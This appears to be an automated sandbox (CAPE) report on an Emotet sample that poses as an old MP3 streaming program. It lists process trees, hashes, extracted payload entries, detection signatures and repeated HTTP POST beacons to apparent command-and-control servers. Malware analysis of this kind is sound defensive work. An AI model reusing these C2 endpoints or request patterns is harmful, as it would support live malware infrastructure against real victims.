Status: Idle
Stream &Information (Read Only):
SysAnimate32
Animate1
MS Sans Serif
SysListView32
List3
&Edit
&Delete
&Get Stream
Bookmark count: 0
MS Sans Serif
&Single MP3 file.
&Numbered files.
&Keep window on top of all other windows.
Clear Stream URL &History
&Cancel
&Apply
Track Seperation Settings
Miscellaneous Options
&Metadata files
You can create a single MP3 file with all tracks merged or create seperate MP3 files for each audio track received. Both the "Numbered files" and "Metadata files" options create individual MP3 files if metadata is available.
The "Numbered files" option creates files namd with a specified prefix and numbered suffix (ex. YourTitle_0001.mp3, YourTitle_0002.mp3, etc). The "Metadata files" options uses available metadata (track, artist, song, etc) to name received audio tracks.
MS Sans Serif
Stream &Name
Stream &URL:
&Cancel
Static
VS_VERSION_INFO
StringFileInfo
040904b0
Comments
CompanyName
Monkey Head Software
FileDescription
Monkey Head Media Stream
FileVersion
1, 0, 0, 1
InternalName
LegalCopyright
2003
LegalTrademarks
OriginalFilename
MHMS.exe
PrivateBuild
ProductName
Monkey Head Media Stream
ProductVersion
1, 0, 0, 1
SpecialBuild
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


ygg9ytft62s5ip.exe, PID: 1964, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Command Line: "C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe"
ygg9ytft62s5ip.exe, PID: 1436, Parent PID: 1964
Full Path: C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Command Line: --400e05c0
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
prepmspterm.exe, PID: 2128, Parent PID: 460
Full Path: C:\Windows\SysWOW64\prepmspterm.exe
Command Line: "C:\Windows\SysWOW64\prepmspterm.exe"
prepmspterm.exe, PID: 2636, Parent PID: 2128
Full Path: C:\Windows\SysWOW64\prepmspterm.exe
Command Line: --525413bf
svchost.exe, PID: 1788, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\System32\svchost.exe -k WerSvcGroup
WerFault.exe, PID: 2108, Parent PID: 1788
Full Path: C:\Windows\sysnative\WerFault.exe
Command Line: C:\Windows\system32\WerFault.exe -u -p 1632 -s 3272
WerFault.exe, PID: 416, Parent PID: 1788
Full Path: C:\Windows\sysnative\WerFault.exe
Command Line: C:\Windows\system32\WerFault.exe -u -p 1632 -s 3060
explorer.exe, PID: 2916, Parent PID: 400
Full Path: C:\Windows\explorer.exe
Command Line: explorer.exe
svchost.exe, PID: 816, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k netsvcs
svchost.exe, PID: 564, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k DcomLaunch
svchost.exe, PID: 1544, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k netsvcs
WmiPrvSE.exe, PID: 552, Parent PID: 564
Full Path: C:\Windows\sysnative\wbem\WmiPrvSE.exe
Command Line: C:\Windows\system32\wbem\wmiprvse.exe -Embedding
taskhost.exe, PID: 2344, Parent PID: 460
Full Path: C:\Windows\sysnative\taskhost.exe
Command Line: "taskhost.exe"

TCP

Source Source Port Destination Destination Port
192.168.35.21 49190 125.99.61.162 7080
192.168.35.21 49194 91.83.93.105 8080
192.168.35.21 49195 91.83.93.105 8080
192.168.35.21 49196 91.83.93.105 8080
192.168.35.21 49197 91.83.93.105 8080
192.168.35.21 49199 91.83.93.105 8080
192.168.35.21 49201 91.83.93.105 8080
192.168.35.21 49202 91.83.93.105 8080
192.168.35.21 49203 91.83.93.105 8080
192.168.35.21 49204 91.83.93.105 8080
192.168.35.21 49205 91.83.93.105 8080
192.168.35.21 49206 91.83.93.105 8080
192.168.35.21 49207 91.83.93.105 8080
192.168.35.21 49208 91.83.93.105 8080
192.168.35.21 49193 94.183.71.206 7080

UDP

No UDP connections recorded.

HTTP Requests

URI Data
http://91.83.93.105:8080/prov/guids/entries/merge/
POST /prov/guids/entries/merge/ HTTP/1.1
Referer: http://91.83.93.105/prov/guids/entries/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 502
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/window/raster/between/
POST /window/raster/between/ HTTP/1.1
Referer: http://91.83.93.105/window/raster/between/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 509
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/balloon/balloon/
POST /balloon/balloon/ HTTP/1.1
Referer: http://91.83.93.105/balloon/balloon/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 498
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/publish/
POST /publish/ HTTP/1.1
Referer: http://91.83.93.105/publish/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/report/cookies/
POST /report/cookies/ HTTP/1.1
Referer: http://91.83.93.105/report/cookies/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 500
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/prep/prov/enabled/merge/
POST /prep/prov/enabled/merge/ HTTP/1.1
Referer: http://91.83.93.105/prep/prov/enabled/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 500
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/loadan/
POST /loadan/ HTTP/1.1
Referer: http://91.83.93.105/loadan/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 509
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/splash/splash/merge/
POST /splash/splash/merge/ HTTP/1.1
Referer: http://91.83.93.105/splash/splash/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 501
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/loadan/json/window/merge/
POST /loadan/json/window/merge/ HTTP/1.1
Referer: http://91.83.93.105/loadan/json/window/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 496
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/vermont/raster/scripts/merge/
POST /vermont/raster/scripts/merge/ HTTP/1.1
Referer: http://91.83.93.105/vermont/raster/scripts/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 482
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/window/ban/
POST /window/ban/ HTTP/1.1
Referer: http://91.83.93.105/window/ban/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 486
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/window/merge/acquire/merge/
POST /window/merge/acquire/merge/ HTTP/1.1
Referer: http://91.83.93.105/window/merge/acquire/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 492
Connection: Keep-Alive
Cache-Control: no-cache

http://91.83.93.105:8080/pnp/
POST /pnp/ HTTP/1.1
Referer: http://91.83.93.105/pnp/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 501
Connection: Keep-Alive
Cache-Control: no-cache


SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source Destination ICMP Type Data
94.183.71.206 192.168.35.21 3
94.183.71.206 192.168.35.21 3
94.183.71.206 192.168.35.21 3

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name prepmspterm.exe
Associated Filenames
C:\Windows\SysWOW64\prepmspterm.exe
File Size 624643 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0efd85b3915d9618f91979e65e520478
SHA1 e70ff18b0f850df07c81c168437f78d51c679625
SHA256 a1d4243b1e2380d5fc9d26ea036bd00c39f09cdcdfc1a3d2b699b5fc15cf29a0
CRC32 E6EF58FC
Ssdeep 6144:89b9SO5dVdRQ/vqkg1gEagdQHiQSzPgAJ76KkWv:8fBV7uikFgCShJkQ
ClamAV None
Yara None matched
CAPE Yara None matched
File name fwtsqmfile00.sqm
Associated Filenames
C:\Windows\Temp\fwtsqmfile00.sqm
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
CAPE Yara None matched
File name fwtsqmfile00.sqm
Associated Filenames
C:\Windows\Temp\fwtsqmfile00.sqm
File Size 140 bytes
File Type data
MD5 71678c5fca12df60a2704dc3a41cf787
SHA1 928c09abb66da3ddaa2259c1ff3ac6d837c4d1e6
SHA256 e5cb21bec1bfd73f212c451725c54c43281c11c24f74fecf47b9fa62a933b053
CRC32 015F712F
Ssdeep 3:Hl1li9Qll+lllt/7V2lFCawoeeXtzlRPWgESl5llll:F2Qm/Ul3XtpR+y//
ClamAV None
Yara None matched
CAPE Yara None matched
File name 9435f817-fed2-454e-88cd-7f78fda62c48
Associated Filenames
C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
File Size 12 bytes
File Type data
MD5 3f1046658d14d4935f38dc51ae2ee619
SHA1 71e0bd14e6959ad6c0bb0657de2c82e8ea40c3eb
SHA256 bebaea824a7e30a7e30e7eca2dcc83a8a67590a2eb408faab1b388466793826e
CRC32 AFC48A36
Ssdeep 3:8tln:8Xn
ClamAV None
Yara None matched
CAPE Yara None matched
Type Emotet Config
RSA public key
address
Type Emotet Payload: 32-bit executable
Size 64000 bytes
Virtual Address 0x00350000
Process ygg9ytft62s5ip.exe
PID 1964
Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
MD5 28c5662db657426c5e78e4d31520063b
SHA1 1c2f679193a05c1d7f9a717339ce80c1dc1cf7d5
SHA256 2f3f06820f6217631de47a015b3022e930683e20c53081f99bfe97f580ba91d9
CRC32 665ABF5A
Ssdeep 1536:GpEHGXHswgKUokPaPfkM8Mf7hBGz0A4Ya6F+ne3W:IzHsAUokS8u7h8IA4YdW
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Type Emotet Payload
Size 62464 bytes
Virtual Address 0x00360000
Process ygg9ytft62s5ip.exe
PID 1964
Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
MD5 dcb0197535016499ee18d35041f7e8e7
SHA1 58c36b291f4487e523b2263791bd81a1944b7fa9
SHA256 7f51cf4468552a814cc613e1295274a4d3ac5b73f5a1d3537ce2eee1d5894e7b
CRC32 CABF28F3
Ssdeep 1536:PpEHGXHswgKUokPaPfkM8Mf7hBGz0A4Ya6F+neV:hzHsAUokS8u7h8IA4Yd
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Sorry! No process dumps.

Processing ( 27.421 seconds )

  • 24.476 BehaviorAnalysis
  • 1.499 CAPE
  • 0.441 Static
  • 0.362 Dropped
  • 0.333 TargetInfo
  • 0.109 TrID
  • 0.092 Deduplicate
  • 0.062 Strings
  • 0.04 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.002 Debug

Signatures ( 8.504 seconds )

  • 0.76 api_spamming
  • 0.725 Doppelganging
  • 0.718 decoy_document
  • 0.635 NewtWire Behavior
  • 0.494 antidbg_windows
  • 0.425 dyre_behavior
  • 0.423 InjectionCreateRemoteThread
  • 0.401 injection_createremotethread
  • 0.399 injection_runpe
  • 0.347 infostealer_browser_password
  • 0.346 InjectionProcessHollowing
  • 0.344 infostealer_browser
  • 0.339 exploit_heapspray
  • 0.318 antidebug_guardpages
  • 0.31 ipc_namedpipe
  • 0.269 InjectionInterProcess
  • 0.258 reads_self
  • 0.165 stack_pivot
  • 0.1 antiav_detectreg
  • 0.086 lsass_credential_dumping
  • 0.042 injection_explorer
  • 0.041 mimics_filetime
  • 0.038 stealth_file
  • 0.037 antivm_generic_disk
  • 0.035 infostealer_ftp
  • 0.034 PlugX
  • 0.027 antivm_vbox_window
  • 0.026 bootkit
  • 0.026 virus
  • 0.026 stealth_timeout
  • 0.021 antivm_generic_scsi
  • 0.021 antisandbox_script_timer
  • 0.021 antianalysis_detectreg
  • 0.02 hancitor_behavior
  • 0.02 infostealer_im
  • 0.014 infostealer_mail
  • 0.01 recon_programs
  • 0.01 antivm_vbox_keys
  • 0.009 antivm_generic_services
  • 0.009 ransomware_files
  • 0.007 antiav_detectfile
  • 0.006 malicious_dynamic_function_loading
  • 0.006 antiemu_wine_func
  • 0.006 dynamic_function_loading
  • 0.006 antivm_vmware_keys
  • 0.005 uac_bypass_eventvwr
  • 0.005 antivm_vbox_libs
  • 0.005 kibex_behavior
  • 0.005 kovter_behavior
  • 0.005 antivm_xen_keys
  • 0.005 darkcomet_regkeys
  • 0.005 recon_fingerprint
  • 0.004 exploit_getbasekerneladdress
  • 0.004 betabot_behavior
  • 0.004 persistence_autorun
  • 0.004 antivm_parallels_keys
  • 0.004 geodo_banking_trojan
  • 0.004 infostealer_bitcoin
  • 0.004 ransomware_extensions
  • 0.003 antiav_avast_libs
  • 0.003 office_flash_load
  • 0.003 exploit_gethaldispatchtable
  • 0.003 shifu_behavior
  • 0.003 antivm_generic_diskreg
  • 0.003 antivm_vbox_files
  • 0.003 antivm_vpc_keys
  • 0.002 antisandbox_sleep
  • 0.002 antisandbox_sunbelt_libs
  • 0.002 antisandbox_sboxie_libs
  • 0.002 InjectionSetWindowLong
  • 0.002 vawtrak_behavior
  • 0.002 antiav_bitdefender_libs
  • 0.002 antianalysis_detectfile
  • 0.002 browser_security
  • 0.002 disables_browser_warn
  • 0.001 tinba_behavior
  • 0.001 hawkeye_behavior
  • 0.001 critical_process
  • 0.001 rat_nanocore
  • 0.001 rat_luminosity
  • 0.001 antivm_vmware_libs
  • 0.001 Vidar Behavior
  • 0.001 EvilGrab
  • 0.001 dep_disable
  • 0.001 neshta_files
  • 0.001 cerber_behavior
  • 0.001 antidbg_devices
  • 0.001 antivm_xen_keys
  • 0.001 antivm_generic_bios
  • 0.001 antivm_generic_cpu
  • 0.001 antivm_generic_system
  • 0.001 antivm_hyperv_keys
  • 0.001 bot_drive
  • 0.001 modify_proxy
  • 0.001 bypass_firewall
  • 0.001 packer_armadillo_regkey
  • 0.001 remcos_regkeys

Reporting ( 0.196 seconds )

  • 0.196 CompressResults
Task ID 94399
Mongo ID 5d9e846cc3c009112d67d9c9
Cuckoo release 1.3-CAPE